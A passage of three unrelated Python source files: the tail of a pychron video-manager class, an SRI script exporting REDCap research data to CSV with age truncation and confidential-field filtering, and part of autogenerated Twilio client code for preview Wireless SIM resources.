# self.stop()
self.video.stop_recording()
self.is_recording = False
def start(self, user=None):
'''
'''
self.info('opening video connection')
self.video.open(user=user)
def stop(self, user=None):
'''
'''
self.info('closing video connection')
self.video.close(user=user)
# def snapshot(self, identifier=None, path=None, root=None, crop=None):
# if path is None:
# if root is None:
# root = snapshot_dir
#
# base = 'frame'
# if identifier is not None:
# base = 'frame_{}_'.format(identifier)
#
#
# path, _cnt = unique_path(root=root, base=base, filetype='jpg')
#
# self.info('saving snapshot {}'.format(path))
# pychron = self.video.record_frame(path, crop=crop)
# return pychron, os.path.basename(path)
# if kind is not None:
# self.image = globals()['{}Image'.format(kind.capitalize())]()
# self.image.source_frame = pychron
# def find_polygons(self, path = None, crop = None):
# if path:
# frame = load_image(path, swap = True)
# if crop:
# icrop(*((frame,) + crop))
#
# self.image = CalibrationImage()
# self.image.source_frame = frame
#
# return self.image.find_polygons(thresh = self.threshold,
# erode_value = self.erosion,
# dilate_value = self.dilation)
# def find_lines(self, path = None, crop = None):
# if path:
# frame = load_image(path, swap = True)
# if crop:
# icrop(*((frame,) + crop))
#
# self.image = CalibrationImage()
# self.image.source_frame = frame
#
# return self.image.process(thresh = self.threshold,
# erode_value = self.erosion,
# dilate_value = self.dilation)
#
# def process_image(self, path = None, angle = None, thresh = None, crop = None, **kw):
# '''
# '''
# if path is None:
# if self.image is None:
# frame = self.video.get_frame(clone = True)
# else:
# frame = self.image.source_frame
# else:
# frame = load_image(path)
#
# if thresh is None:
# thresh = self.threshold
# if angle is None:
# angle = self.angle
#
# if self.image is None:
# self.image = TargetImage()
#
# if crop:
# icrop(*((frame,) + crop))
#
# self.image.source_frame = frame
#
# #self.load_image(path = path)
# target = self.image.process(thresh, angle, **kw)
#
# return target
def _canvas_default(self):
return VideoCanvas(video=self.video)
# def _video_default(self):
# '''
# '''
#
# return Video()
# def _image_default(self):
# '''
# '''
# return TargetImage()
# @on_trait_change('threshold,erosion,angle,dilation,x,y')
# def update(self):
# '''
# '''
# self.find_lines()
# # p = '/Users/fargo2/Desktop/laser_tray_75.tiff'
# av = self.process_image(#crop = (self.x, self.y, 250, 250),
# # erode = self.erosion,
# #dilate = self.dilation
# )
def traits_view(self):
v = View(
HGroup(
self._button_factory('record', 'record_label', align='right'),
# Item('pause')
),
Item('canvas', show_label=False,
resizable=False,
editor=VideoComponentEditor(width=self.width,
height=self.height)))
return v
#
# def image_view(self):
# '''
# '''
# control_grp = VGroup(Item('threshold', editor=RangeEditor(mode='slider',
# low=0,
# high=255)),
# # Item('angle', editor = RangeEditor(mode = 'slider',
# # low = 0,
# # high = 360)),
# Item('erosion', editor=RangeEditor(mode='spinner',
# low=0,
# high=4)),
# Item('dilation', editor=RangeEditor(mode='spinner',
# low=0,
# high=4)))
# # Item('x', editor = RangeEditor(mode = 'spinner',
# # low = 0,
# # high = 500)),
# # Item('y', editor = RangeEditor(mode = 'spinner',
# # low = 0,
# # high = 500)),)
# return View(
# VGroup(control_grp,
# Item('image', show_label=False,
# editor=ImageEditor())
# ),
# x=0.05,
# y=0.1,
# #386365
# width=1000,
# height=700,
# resizable=True,
# title=self.title
# )
if __name__ == '__main__':
from pychron.core.helpers.logger_setup import logging_setup
logging_setup('video')
vm = VideoManager()
# p = '/Users/fargo2/Desktop/laser_tray_50.tiff'
# vm.process_image(p, crop=(0, 0, 250, 250))
vm.start()
vm.configure_traits() # view='image_view')
# ================== EOF ========================
# def process_image_dir(self, root):
# '''
# @type root: C{str}
# @param root:
# '''
# A = 60
# t = 99
# results = []
# if os.path.isdir(root):
# files = os.listdir(root)
#
# for f in files:
# if not f.startswith('.'):
# path = os.path.join(root, f)
# self.title = f
#
# target = self.process_image(path, angle = A, thresh = t)
#
# results.append((f, target))
#
# return results
#
#
# # def load_image(self, path = None):
# # '''
# # @type path: C{str}
# # @param path:
# # '''
# # if path is None:
# # frame = load_image(path)
# # self.image.source_frame = frame
#
#
# def save_frame(self, name = None, frame = None, path = None, root = None):
# '''
# @type name: C{str}
# @param name:
#
# @type frame: C{str}
# @param frame:
#
# @type path: C{str}
# @param path:
#
# @type root: C{str}
# @param root:
# '''
# if path is None:
# pass
# if root is None:
# root = os.path.join(paths.data_dir, 'video')
# if frame is None:
# frame = self.video.get_frame()
#
#
# if name is not None:
# path = os.path.join(root, '%s.jpg' % name)
#
# sp = save_image(frame, root, path = path)
# self.info('=====image located at %s======' % sp)
# return sp
#
# def accumulate_frames(self, setpoint, n, interval):
# '''
# @type setpoint: C{str}
# @param setpoint:
#
# @type n: C{str}
# @param n:
#
# @type interval: C{str}
# @param interval:
# '''
# for i in range(n):
# self.info('accumulating frame %i' % (i))
# frame = self.video.get_frame()
# self.save_frame(frame = frame, name = 'frame%i_%i' % (setpoint, i))
# time.sleep(interval)
# # #fi=self.video.get_frame()
# #
# # #dst=new_dst(fi)
# # for i in range(n-1):
# # self.info('accumulating frame %i'%(i))
# # f=self.video.get_frame()#gray=True)
# # #cvAcc(f,dst)
# # time.sleep(interval)
# #
# # return fi
#
# def _process_fired(self):
# '''
# '''
# f = self.accumulate_frames(5, 1)
# self.save_frame(frame = f, name = 'test')
# def process_frame(self,frame=None,path=None,type='temperature',**kw):
# self.logger.info('========= processing frame for %s =========='%type)
#
# if path is not None:
# #frame=cvLoadImage(path)
# frame=load_image(path)
#
# elif frame is None:
# frame=self.video.get_frame(clone=True,
# flag=CV_CVTIMG_SWAP_RB
# )
#
# self.image.frames.append(frame)
# a=self.image
#
# #locate the ROI
# self.logger.info('=========== locating target and selecting ROI =========')
# #a.locate_target()
#
# #calculate a temperature
# self.logger.info('============ calculating temperature from ROI =========')
# #avg= a.get_target_info()
#
#
# #self.edit_traits(view='image_view')
# return 10
# #return avg.val
# low_threshold=DelegatesTo('image')
# high_threshold=DelegatesTo('image')
#
# low_low=DelegatesTo('image')
# low_high=DelegatesTo('image')
#
# high_low=DelegatesTo('image')
# high_high=DelegatesTo('image')
# process=Button
# prev_ui=Any
#
#
# record_button=Event
# record_label=Property(depends_on='recording')
# recording=Bool
#
# snapshot=DelegatesTo('video')
# def process_view(self):
# return View(Item('low_threshold',editor=RangeEditor(low_name='low_low',
# high_name='low_high')),
# Item('high_threshold',editor=RangeEditor(low_name='high_low',
# high_name='high_high',
# mode='slider')),
# Item('image',show_label=False,
# editor=ImageEditor()),
# x=0.05,
# y=0.1,
# width=0.75,
# height=0.75,
# resizable=True,
# title='Snapshot View'
# )
# # def _snapshot_fired(self):
# # directory='/Users/Ross/Pychrondata/data/video'
# # self.video.record_frame(directory)
#
# def _record_button_fired(self):
# if not self.recording:
# self.logger.info('starting video record')
#
# self.video.start_recording()
# else:
# self.logger.info('stop video record')
#
# self.recording = not self.recording
#
# def _get_record_label(self):
# return 'RECORD' if not self.recording else 'STOP'
#
# def _high_threshold_changed(self):
# self.low_high=self.high_threshold
#
# def _set_center_fired(self):
# center=self.video.mouse_x,self.video.mouse_y
#
# #self.video.set_center()
# print center
#
# self.image.center=center
|
|
#!/usr/bin/env python
##
## Copyright 2016 SRI International
## See COPYING file distributed along with the package for the copyright and license terms.
##
import os
import re
import glob
import time
import filecmp
import pandas
# Round age to 2 decimal places for increased identity protection
def truncate_age(age_in):
    match = re.match(r'([0-9]*\.[0-9]*)', str(age_in))
if match:
return round(float(match.group(1)), 2)
else:
return age_in
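# For illustration (hypothetical values): truncate_age('14.6789') returns
# 14.68, while inputs without a decimal point, e.g. '' or 'nan', are
# returned unchanged.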
# "Safe" CSV export - this will catch IO errors from trying to write to a file
# that is currently being read and will retry a number of times before giving up
# This function will also confirm whether the newly created file is different
# from an already existing file of the same name. Only changed files will be
# updated.
def safe_csv_export(df, fname, verbose=False):
success = False
retries = 10
while (not success) and (retries > 0):
try:
df.to_csv(fname + '.new', index=False)
success = True
except IOError as e:
print "ERROR: failed to write file", fname, "with errno", e.errno
if e.errno == 11:
print "Retrying in 5s..."
time.sleep(5)
retries -= 1
else:
retries = 0
if success:
# Check if new file is equal to old file
if os.path.exists(fname) and filecmp.cmp(fname, fname + '.new',
shallow=False):
# Equal - remove new file
os.remove(fname + '.new')
else:
# Not equal or no old file: put new file in its final place
os.rename(fname + '.new', fname)
if verbose:
print "Updated", fname
# Export selected REDCap data to pipeline/distribution directory
def export(redcap_project, site, subject, event, subject_data, visit_age,
visit_data, arm_code, visit_code, subject_code, subject_datadir,
forms_this_event, select_exports=None, verbose=False):
# Mark subjects/visits that have QA completed by creating a hidden marker
# file
qafile_path = os.path.join(subject_datadir, '.qacomplete')
if visit_data['mri_qa_completed'] == '1':
try:
if not os.path.exists(qafile_path):
qafile = open(qafile_path, 'w')
qafile.close()
        except (IOError, OSError):
print "ERROR: unable to open QA marker file in", subject_datadir
else:
try:
if os.path.exists(qafile_path):
os.remove(qafile_path)
        except (IOError, OSError):
print "ERROR: unable to remove QA marker file", qafile_path
# Check if the "measures" subdirectory already exists - this is where all
# the csv files go. Create it if necessary.
measures_dir = os.path.join(subject_datadir, 'measures')
if not os.path.exists(measures_dir):
os.makedirs(measures_dir)
# Export demographics (if selected)
if not select_exports or 'demographics' in select_exports:
# Create "demographics" file "by hand" - this has some data not (yet)
# in REDCap.
        # Latino and race coding arrives here as floating point numbers; make
        # int strings from that (cannot use "int()" because it would fail for
        # missing data)
        hispanic_code = re.sub(r'(\.0)|(nan)', '', str(subject_data['hispanic']))
        race_code = re.sub(r'(\.0)|(nan)', '', str(subject_data['race']))
# scanner manufacturer map
mfg = dict(A='siemens', B='ge', C='ge', D='siemens', E='ge')
demographics = [
['subject', subject_code],
['arm', arm_code],
['visit', visit_code],
['site', site],
['sex', subject[8]],
['visit_age', truncate_age(visit_age)],
['mri_structural_age', truncate_age(visit_data['mri_t1_age'])],
['mri_diffusion_age', truncate_age(visit_data['mri_dti_age'])],
['mri_restingstate_age',
truncate_age(visit_data['mri_rsfmri_age'])],
['exceeds_bl_drinking',
'NY'[int(subject_data['enroll_exception___drinking'])]],
['siblings_enrolled_yn',
'NY'[int(subject_data['siblings_enrolled___true'])]],
['siblings_id_first', subject_data['siblings_id1']],
['hispanic', code_to_label_dict['hispanic'][hispanic_code][0:1]],
['race', race_code],
['race_label', code_to_label_dict['race'][race_code]],
['participant_id', subject],
['scanner', mfg[site]],
]
if race_code == '6':
# if other race is specified, mark race label with manually curated
# race code
demographics[14] = ('race_label', subject_data['race_other_code'])
series = pandas.Series()
for (key, value) in demographics:
series = series.set_value(key, value)
safe_csv_export(pandas.DataFrame(series).T,
os.path.join(measures_dir, 'demographics.csv'),
verbose=verbose)
    # First get data for all fields across all forms in this event - this is
    # faster than transferring each form separately
all_fields = ['study_id']
export_list = []
for export_name in export_forms.keys():
if (import_forms[export_name] in forms_this_event) \
and (not select_exports or export_name in select_exports):
all_fields += [re.sub('___.*', '', field_name) for field_name in
export_forms[export_name]]
export_list.append(export_name)
all_records = redcap_project.export_records(fields=all_fields,
records=[subject],
events=[event],
format='df')
# Now go form by form and export data
for export_name in export_list:
        # Remove the complete field from the list of fields
complete = '{}_complete'.format(import_forms.get(export_name))
fields = [column for column in export_forms.get(export_name)
if column != complete]
# Select data for this form - "reindex_axis" is necessary to put
# fields in listed order - REDCap returns them lexicographically sorted
record = all_records[fields].reindex_axis(fields, axis=1)
if len(record) == 1:
# First, add the three index columns
record.insert(0, 'subject', subject_code)
record.insert(1, 'arm', arm_code)
record.insert(2, 'visit', visit_code)
field_idx = 0
output_fields = []
for field in record.columns:
# Rename field for output if necessary
if field in export_rename[export_name].keys():
output_field = export_rename[export_name][field]
else:
output_field = field
output_fields.append(output_field)
# If this is an "age" field, truncate to 2 digits for privacy
if re.match('.*_age$', field):
record[field] = record[field].apply(truncate_age)
# If this is a radio or dropdown field
# (except "FORM_[missing_]why"), add a separate column for the
# coded label
if field in code_to_label_dict.keys() and not re.match(
'.*_why$', field):
code = str(record[field].ix[0])
label = ''
if code in code_to_label_dict[field].keys():
label = code_to_label_dict[field][code]
field_idx += 1
record.insert(field_idx, output_field + '_label', label)
output_fields.append(output_field + '_label')
field_idx += 1
# Apply renaming to columns
record.columns = output_fields
# Figure out path for CSV file and export this record
safe_csv_export(record,
os.path.join(measures_dir, export_name + '.csv'),
verbose=verbose)
# Filter potentially confidential fields out of given list, based on project
# metadata
def filter_out_confidential(field_list, metadata_dict):
filtered_list = []
for field_name in field_list:
try:
(field_type, field_validation, field_label, text_val_min,
text_val_max, choices) = metadata_dict[
re.sub('___.*', '', field_name)]
if (field_type != 'text' and field_type != 'notes') \
or (field_validation in ['number', 'integer', 'time']):
filtered_list.append(field_name)
else:
print "WARNING: field '%s' is of type '%s' with " \
"validation '%s' - excluding as potentially " \
"confidential." % (field_name,
field_type,
field_validation)
        except KeyError:
if '_complete' in field_name:
filtered_list.append(field_name)
return filtered_list
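# For illustration (hypothetical metadata): a 'text' field validated as
# 'number', 'integer' or 'time' is kept, a free-text or 'notes' field is
# excluded as potentially confidential, and 'FORM_complete' fields are kept
# even though they have no metadata entry (the except branch above).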
# Filter confidential fields from all forms
metadata_dict = dict()
def filter_all_forms(redcap_metadata):
# First turn metadata into easily digested dict
for field in redcap_metadata:
field_tuple = (field['field_type'],
field['text_validation_type_or_show_slider_number'],
field['field_label'],
field['text_validation_min'],
field['text_validation_max'],
field['select_choices_or_calculations'])
metadata_dict[field['field_name']] = field_tuple
# Filter each form
for export_name in export_forms.keys():
export_forms[export_name] = filter_out_confidential(
export_forms[export_name], metadata_dict)
# Make lookup dicts for mapping radio/dropdown codes to labels
code_to_label_dict = dict()
def make_code_label_dict(redcap_metadata):
# First turn metadata into easily digested dict
for field in redcap_metadata:
if field['field_type'] in ['radio', 'dropdown']:
field_dict = {'': ''}
for choice in field['select_choices_or_calculations'].split('|'):
code_label = [c.strip() for c in choice.split(',')]
field_dict[code_label[0]] = ', '.join(code_label[1:])
code_to_label_dict[field['field_name']] = field_dict
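# For illustration (hypothetical field): a REDCap choices string such as
# '1, Male | 2, Female' yields
# code_to_label_dict[field_name] == {'': '', '1': 'Male', '2': 'Female'}.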
# Organize REDCap metadata (data dictionary)
def organize_metadata(redcap_metadata):
filter_all_forms(redcap_metadata)
make_code_label_dict(redcap_metadata)
# Create data dictionaries in a user-provided directory
# The columns of a REDCap data dictionary MUST be in this order!
# For each entry in the form list, a corresponding variable must be defined.
def create_datadicts_general(datadict_dir, datadict_base_file,
export_forms_list, variable_list):
redcap_datadict_columns = ["Variable / Field Name", "Form Name",
"Section Header", "Field Type", "Field Label",
"Choices, Calculations, OR Slider Labels",
"Field Note",
"Text Validation Type OR Show Slider Number",
"Text Validation Min", "Text Validation Max",
"Identifier?",
"Branching Logic (Show field only if...)",
"Required Field?", "Custom Alignment",
"Question Number (surveys only)",
"Matrix Group Name", "Matrix Ranking?"]
if not os.path.exists(datadict_dir):
os.makedirs(datadict_dir)
ddict = pandas.DataFrame(index=variable_list,
columns=redcap_datadict_columns)
for form_name, var in zip(export_forms_list, variable_list):
field_name = re.sub('___.*', '', var)
ddict["Variable / Field Name"][var] = field_name
ddict["Form Name"][var] = form_name
# Check if var is in data dict ('FORM_complete' fields are NOT)
if field_name in metadata_dict.keys():
ddict["Field Type"][var] = metadata_dict[field_name][0]
            # Encode as UTF-8, otherwise writing the dictionary to file can
            # cause problems; it is just a text field, so it should not
            # matter otherwise
ddict["Field Label"][var] = metadata_dict[field_name][2].encode(
'utf-8')
ddict["Text Validation Type OR Show Slider Number"][var] = \
metadata_dict[field_name][1]
ddict["Text Validation Min"][var] = metadata_dict[field_name][3]
ddict["Text Validation Max"][var] = metadata_dict[field_name][4]
            # Encode as UTF-8, otherwise writing the dictionary to file can
            # cause problems; it is just a choice field, so it should not
            # matter otherwise
ddict["Choices, Calculations, OR Slider Labels"][var] = \
metadata_dict[field_name][5].encode('utf-8')
# Finally, write the data dictionary to a CSV file
dicFileName = os.path.join(datadict_dir,
datadict_base_file + '_datadict.csv')
try:
ddict.to_csv(dicFileName, index=False)
    except Exception:
import sys
sys.exit(
"ERROR:create_datadicts: could not export dictionary %s: \n%s:%s" %
(dicFileName, sys.exc_info()[0].__doc__, sys.exc_info()[1]))
# Defining an entry list only makes sense if export_forms_list consists of a
# single entry!
def create_datadicts(datadict_dir):
# Go over all exported forms
for export_name in export_forms.keys():
export_form_entry_list = export_forms[export_name]
size_entry_list = len(export_form_entry_list)
export_form_list = [export_name] * size_entry_list
create_datadicts_general(datadict_dir, export_name, export_form_list,
export_form_entry_list)
# Create custom form for demographics
export_form_entry_list = ['site', 'sex', 'visit_age', 'mri_structural_age',
'mri_diffusion_age', 'mri_restingstate_age',
'exceeds_bl_drinking', 'siblings_enrolled_yn',
'siblings_id_first', 'hispanic', 'race',
'race_label', 'participant_id', 'scanner']
# First two entries are extracted from SubjectID
export_form_list = ['basic_demographics', 'basic_demographics',
'basic_demographics', 'mri_report', 'mri_report',
'mri_report', 'basic_demographics',
'basic_demographics', 'basic_demographics',
'basic_demographics', 'basic_demographics',
'basic_demographics', 'basic_demographics',
'basic_demographics']
create_datadicts_general(datadict_dir, 'demographics', export_form_list,
export_form_entry_list)
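# For illustration: with the exports configured below, create_datadicts
# writes one '<export_name>_datadict.csv' per exported form, plus the
# hand-built 'demographics_datadict.csv', into datadict_dir.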
#
# Initialization - figure out which instruments we're supposed to export, and
# which fields
#
import_forms = dict()
export_forms = dict()
export_names = dict()
export_rename = dict()
exports_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'exports')
exports_files = glob.glob(os.path.join(exports_dir, '*.txt'))
for f in exports_files:
    with open(f, 'r') as export_file:
        contents = [line.strip() for line in export_file.readlines()]
    export_name = re.sub(r'\.txt$', '', os.path.basename(f))
    import_form_name = contents[0]
import_forms[export_name] = import_form_name
    export_forms[export_name] = [re.sub(r'\[.*\]', '', field) for field in
contents[1:]] + [
'%s_complete' % import_form_name]
export_rename[export_name] = dict()
for field in contents[1:]:
        match = re.match(r'^(.+)\[(.+)\]$', field)
if match:
export_rename[export_name][match.group(1)] = match.group(2)
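# For illustration, a hypothetical exports/demographics.txt would look like:
#
#   basic_demographics
#   study_id
#   dob[date_of_birth]
#   sex
#
# i.e. line 1 names the REDCap form to import from, and each following line
# names a field, optionally with '[new_name]' to rename it on export; the
# form's '<form>_complete' field is appended automatically.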
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.preview.wireless.sim.usage import UsageList
class SimList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the SimList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.wireless.sim.SimList
:rtype: twilio.rest.preview.wireless.sim.SimList
"""
super(SimList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/Sims'.format(**self._solution)
def stream(self, status=values.unset, iccid=values.unset,
rate_plan=values.unset, e_id=values.unset,
sim_registration_code=values.unset, limit=None, page_size=None):
"""
Streams SimInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode status: The status
:param unicode iccid: The iccid
:param unicode rate_plan: The rate_plan
:param unicode e_id: The e_id
:param unicode sim_registration_code: The sim_registration_code
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.sim.SimInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
status=status,
iccid=iccid,
rate_plan=rate_plan,
e_id=e_id,
sim_registration_code=sim_registration_code,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, status=values.unset, iccid=values.unset, rate_plan=values.unset,
e_id=values.unset, sim_registration_code=values.unset, limit=None,
page_size=None):
"""
Lists SimInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode status: The status
:param unicode iccid: The iccid
:param unicode rate_plan: The rate_plan
:param unicode e_id: The e_id
:param unicode sim_registration_code: The sim_registration_code
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.sim.SimInstance]
"""
return list(self.stream(
status=status,
iccid=iccid,
rate_plan=rate_plan,
e_id=e_id,
sim_registration_code=sim_registration_code,
limit=limit,
page_size=page_size,
))
def page(self, status=values.unset, iccid=values.unset, rate_plan=values.unset,
e_id=values.unset, sim_registration_code=values.unset,
page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of SimInstance records from the API.
Request is executed immediately
:param unicode status: The status
:param unicode iccid: The iccid
:param unicode rate_plan: The rate_plan
:param unicode e_id: The e_id
:param unicode sim_registration_code: The sim_registration_code
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimPage
"""
params = values.of({
'Status': status,
'Iccid': iccid,
'RatePlan': rate_plan,
'EId': e_id,
'SimRegistrationCode': sim_registration_code,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return SimPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of SimInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return SimPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a SimContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.sim.SimContext
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
return SimContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a SimContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.sim.SimContext
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
return SimContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.SimList>'
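# A minimal usage sketch (hypothetical credentials; the preview Wireless API
# is subject to change and requires developer preview access):
#
#   from twilio.rest import Client
#   client = Client('ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX', 'your_auth_token')
#   for sim in client.preview.wireless.sims.list(limit=20):
#       print(sim.sid, sim.status)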
class SimPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the SimPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.wireless.sim.SimPage
:rtype: twilio.rest.preview.wireless.sim.SimPage
"""
super(SimPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of SimInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.wireless.sim.SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
return SimInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.SimPage>'
class SimContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, sid):
"""
Initialize the SimContext
:param Version version: Version that contains the resource
:param sid: The sid
:returns: twilio.rest.preview.wireless.sim.SimContext
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
super(SimContext, self).__init__(version)
# Path Solution
self._solution = {'sid': sid, }
self._uri = '/Sims/{sid}'.format(**self._solution)
# Dependents
self._usage = None
def fetch(self):
"""
Fetch a SimInstance
:returns: Fetched SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return SimInstance(self._version, payload, sid=self._solution['sid'], )
def update(self, unique_name=values.unset, callback_method=values.unset,
callback_url=values.unset, friendly_name=values.unset,
rate_plan=values.unset, status=values.unset,
commands_callback_method=values.unset,
commands_callback_url=values.unset, sms_fallback_method=values.unset,
sms_fallback_url=values.unset, sms_method=values.unset,
sms_url=values.unset, voice_fallback_method=values.unset,
voice_fallback_url=values.unset, voice_method=values.unset,
voice_url=values.unset):
"""
Update the SimInstance
:param unicode unique_name: The unique_name
:param unicode callback_method: The callback_method
:param unicode callback_url: The callback_url
:param unicode friendly_name: The friendly_name
:param unicode rate_plan: The rate_plan
:param unicode status: The status
:param unicode commands_callback_method: The commands_callback_method
:param unicode commands_callback_url: The commands_callback_url
:param unicode sms_fallback_method: The sms_fallback_method
:param unicode sms_fallback_url: The sms_fallback_url
:param unicode sms_method: The sms_method
:param unicode sms_url: The sms_url
:param unicode voice_fallback_method: The voice_fallback_method
:param unicode voice_fallback_url: The voice_fallback_url
:param unicode voice_method: The voice_method
:param unicode voice_url: The voice_url
:returns: Updated SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
data = values.of({
'UniqueName': unique_name,
'CallbackMethod': callback_method,
'CallbackUrl': callback_url,
'FriendlyName': friendly_name,
'RatePlan': rate_plan,
'Status': status,
'CommandsCallbackMethod': commands_callback_method,
'CommandsCallbackUrl': commands_callback_url,
'SmsFallbackMethod': sms_fallback_method,
'SmsFallbackUrl': sms_fallback_url,
'SmsMethod': sms_method,
'SmsUrl': sms_url,
'VoiceFallbackMethod': voice_fallback_method,
'VoiceFallbackUrl': voice_fallback_url,
'VoiceMethod': voice_method,
'VoiceUrl': voice_url,
})
payload = self._version.update(
'POST',
self._uri,
data=data,
)
return SimInstance(self._version, payload, sid=self._solution['sid'], )
@property
def usage(self):
"""
Access the usage
:returns: twilio.rest.preview.wireless.sim.usage.UsageList
:rtype: twilio.rest.preview.wireless.sim.usage.UsageList
"""
if self._usage is None:
self._usage = UsageList(self._version, sim_sid=self._solution['sid'], )
return self._usage
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.SimContext {}>'.format(context)
class SimInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, payload, sid=None):
"""
Initialize the SimInstance
:returns: twilio.rest.preview.wireless.sim.SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
super(SimInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'unique_name': payload.get('unique_name'),
'account_sid': payload.get('account_sid'),
'rate_plan_sid': payload.get('rate_plan_sid'),
'friendly_name': payload.get('friendly_name'),
'iccid': payload.get('iccid'),
'e_id': payload.get('e_id'),
'status': payload.get('status'),
'commands_callback_url': payload.get('commands_callback_url'),
'commands_callback_method': payload.get('commands_callback_method'),
'sms_fallback_method': payload.get('sms_fallback_method'),
'sms_fallback_url': payload.get('sms_fallback_url'),
'sms_method': payload.get('sms_method'),
'sms_url': payload.get('sms_url'),
'voice_fallback_method': payload.get('voice_fallback_method'),
'voice_fallback_url': payload.get('voice_fallback_url'),
'voice_method': payload.get('voice_method'),
'voice_url': payload.get('voice_url'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'url': payload.get('url'),
'links': payload.get('links'),
}
# Context
self._context = None
self._solution = {'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: SimContext for this SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
if self._context is None:
self._context = SimContext(self._version, sid=self._solution['sid'], )
return self._context
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def unique_name(self):
"""
:returns: The unique_name
:rtype: unicode
"""
return self._properties['unique_name']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def rate_plan_sid(self):
"""
:returns: The rate_plan_sid
:rtype: unicode
"""
return self._properties['rate_plan_sid']
@property
def friendly_name(self):
"""
:returns: The friendly_name
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def iccid(self):
"""
:returns: The iccid
:rtype: unicode
"""
return self._properties['iccid']
@property
def e_id(self):
"""
:returns: The e_id
:rtype: unicode
"""
return self._properties['e_id']
@property
def status(self):
"""
:returns: The status
:rtype: unicode
"""
return self._properties['status']
@property
def commands_callback_url(self):
"""
:returns: The commands_callback_url
:rtype: unicode
"""
return self._properties['commands_callback_url']
@property
def commands_callback_method(self):
"""
:returns: The commands_callback_method
:rtype: unicode
"""
return self._properties['commands_callback_method']
@property
def sms_fallback_method(self):
"""
:returns: The sms_fallback_method
:rtype: unicode
"""
return self._properties['sms_fallback_method']
@property
def sms_fallback_url(self):
"""
:returns: The sms_fallback_url
:rtype: unicode
"""
return self._properties['sms_fallback_url']
@property
def sms_method(self):
"""
:returns: The sms_method
:rtype: unicode
"""
